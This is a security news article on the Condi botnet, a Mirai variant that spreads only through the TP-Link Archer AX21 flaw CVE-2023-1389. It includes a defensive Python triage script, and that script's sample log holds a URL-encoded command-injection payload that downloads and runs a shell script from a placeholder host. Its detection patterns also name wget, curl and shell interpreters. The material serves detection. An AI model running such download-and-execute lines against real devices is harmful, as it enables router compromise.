Stresser/Booter Service’s Mirai-Based Botnet Sample Only Spreads via Single Flaw
A stresser/booter service selling website disruptions via a Mirai-based botnet called Condi is the latest to target consumer-grade Wi-Fi routers running unpatched firmware.
A threat actor has advertised the Condi botnet through a “Condi Network” Telegram channel launched in May 2022 and is monetizing the service by offering distributed denial-of-service attacks as well as selling the source code for the botnet itself, security researchers at cybersecurity firm Fortinet reported.
Recent versions of the botnet source code have been updated to target TP-Link Archer AX21 – aka AX1800 – routers that remain vulnerable to CVE-2023-1389, according to the FortiGuard Labs research team. The bug allows “an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request,” according to the U.S. National Vulnerability Database.
The bug is present in TP-Link Archer AX21 firmware versions prior to 1.1.4 build 20230219.
The TP-Link flaw became public knowledge during the Pwn2Own competition last December in Toronto, when three different teams independently exploited the flaw via either LAN or WAN. The teams also tipped off China-based TP-Link to the flaw, and in March the vendor updated the device firmware to patch the flaw.
In April, researchers from Trend Micro’s Zero Day Initiative reported that CVE-2023-1389 had been “added to the Mirai botnet arsenal.” Devices in Eastern Europe appeared to fall victim first, but infections have already spread outside the region.
Mirai-Based Botnets Power On
Numerous versions of Mirai are in the wild, and routers remain one of their top targets. Last month, security researchers warned that a flaw in numerous Zyxel network devices, fixed via an update released in April, was being exploited at a massive scale.
Mirai first appeared in 2016, thanks to three gamers designing a botnet that could infect a large number of internet of things devices by using their default or hard-coded credentials. While the original Mirai coders pleaded guilty to federal charges in 2017, someone leaked the Mirai source code online, and since then many different attackers have continued to adapt and use it.
They include the operator of Condi, who has already iterated the botnet’s source code multiple times. Fortinet’s teardown of the code found that the malware not only attempts to deactivate rival botnet code but also aims “to kill off older versions of Condi currently running on an infected device together with selected system processes,” including binaries that could be used to shut down or reboot the system, since this would eradicate the Mirai infection.
Fortinet researchers said the latest version of Condi abounds with serious errors “likely to wreak havoc and prevent the infected device from functioning correctly if the malware happens to terminate system processes.”
The original Mirai malware could spread itself to dozens of different types of IoT devices still in their default configuration. Subsequently, many versions of Mirai have been updated to target known vulnerabilities in a range of IoT devices.
Target of Sample: Single Flaw
Fortinet’s researchers said that while versions of Condi previously seen in the wild also targeted a laundry list of devices with known vulnerabilities, the fresh sample they found only scans for CVE-2023-1389.
“Unlike most DDoS botnets, this sample does not propagate by trying different credentials,” the firm reported. “Instead, it embeds a simple scanner modified from Mirai’s original telnet scanner to scan for any public IPs with open ports 80 or 8080 – commonly used for HTTP servers – and then sends a hard-coded exploitation request to download and execute a remote shell script … which will infect the device with Condi if it is a vulnerable TP-Link Archer AX21 device.”
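The two facts a defender can act on here are the patched firmware threshold given above (1.1.4 build 20230219) and the propagation pattern Fortinet describes: an HTTP request on port 80 or 8080 that carries a command injection whose payload fetches and runs a remote shell script. The following Python is an added triage helper written for this page; it is not Fortinet's tooling or anything from the Condi source. The log line format, the IP addresses, the hypothetical `/cgi-bin/router.cgi` path and the constructed request bodies are all assumptions for the example, and the injection heuristic is deliberately generic (shell metacharacters plus a downloader plus an interpreter) rather than tied to the specific CVE-2023-1389 request, which this article does not reproduce.

```python
import re
from urllib.parse import unquote_plus

# Patched threshold from the article: Archer AX21 firmware prior to
# 1.1.4 build 20230219 is affected by CVE-2023-1389.
PATCHED = (1, 1, 4, 20230219)

# TP-Link style version strings look like "1.1.4 Build 20230219 rel.51938";
# the trailing release tag is ignored for the comparison.
_VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\s+build\s+(\d{8})", re.IGNORECASE)


def parse_firmware(version: str):
    """Return (major, minor, patch, build_date) or None if no build date is present."""
    m = _VER_RE.search(version)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_firmware(version: str) -> bool:
    """True when the firmware predates the patched build.
    An unparseable string is treated as vulnerable (fail closed)."""
    parsed = parse_firmware(version)
    return True if parsed is None else parsed < PATCHED


# Generic "fetch a script and run it" heuristic: injection metacharacters,
# a downloader, and an interpreter or chmod must all appear in one request.
_INJECT_RE = re.compile(r"(\$\(|`|;|\|\||&&|\|)")
_FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
_EXEC_RE = re.compile(r"\b(sh|bash|chmod)\b", re.IGNORECASE)
_URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)


def looks_like_script_drop(decoded_request: str) -> bool:
    """Heuristic match on an already URL-decoded path+body string."""
    return bool(_INJECT_RE.search(decoded_request)
                and _FETCH_RE.search(decoded_request)
                and _EXEC_RE.search(decoded_request))


def extract_download_hosts(decoded_request: str):
    """Hosts the payload would fetch from; candidates for a blocklist."""
    return _URL_HOST_RE.findall(decoded_request)


def flag_requests(log_text: str):
    """Scan constructed log lines of the form
    '<src_ip> <method> <path> <url-encoded-body-or-dash>' (assumed format)
    and return one dict per request that looks like an exploitation attempt."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue  # malformed line; skip rather than guess
        src, method, path, body = parts
        decoded = unquote_plus(path + " " + body)
        if looks_like_script_drop(decoded):
            hits.append({"src": src, "method": method, "path": path,
                         "download_hosts": extract_download_hosts(decoded)})
    return hits


# Constructed sample log for the example: one injection attempt that
# decodes to cfg=$(wget http://203.0.113.5/t.sh -O-|sh), plus benign traffic,
# including a path with a ';' but no downloader, to show the heuristic
# needs all three signals.
SAMPLE_LOG = """\
198.51.100.23 GET / -
198.51.100.23 POST /cgi-bin/router.cgi cfg=%24%28wget+http%3A%2F%2F203.0.113.5%2Ft.sh+-O-%7Csh%29
192.168.0.10 GET /webpages/index.html -
192.168.0.10 POST /cgi-bin/router.cgi form=login&username=admin&password=hunter2
198.51.100.77 GET /status;view=wan -
"""


def triage(version: str, log_text: str):
    """Combine both checks into one verdict for a router."""
    return {"vulnerable_firmware": is_vulnerable_firmware(version),
            "suspicious_requests": flag_requests(log_text)}


if __name__ == "__main__":
    # Version string is a constructed example of the pre-patch format.
    print(triage("1.1.3 Build 20220919 rel.12345", SAMPLE_LOG))
```

The firmware check fails closed on purpose: a device whose version string cannot be parsed is reported as vulnerable so it gets looked at. The request heuristic will miss an attacker who encodes the payload differently, so treat it as a triage filter over router or proxy logs, not as a substitute for updating the firmware.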
The malware sample reaches out to a command-and-control network that appears to be tied to a domain connected to the Condi Network Telegram channel, according to Fortinet’s researchers. This suggests that the Condi operator, rather than someone who purchased the Condi source code and is running their own version of the DDoS botnet, is behind these attacks.
The researchers published a list of URLs that infected routers contact to download the remote shell script, as well as two known command-and-control server addresses, all of which can be blocked to defend against this particular Condi sample.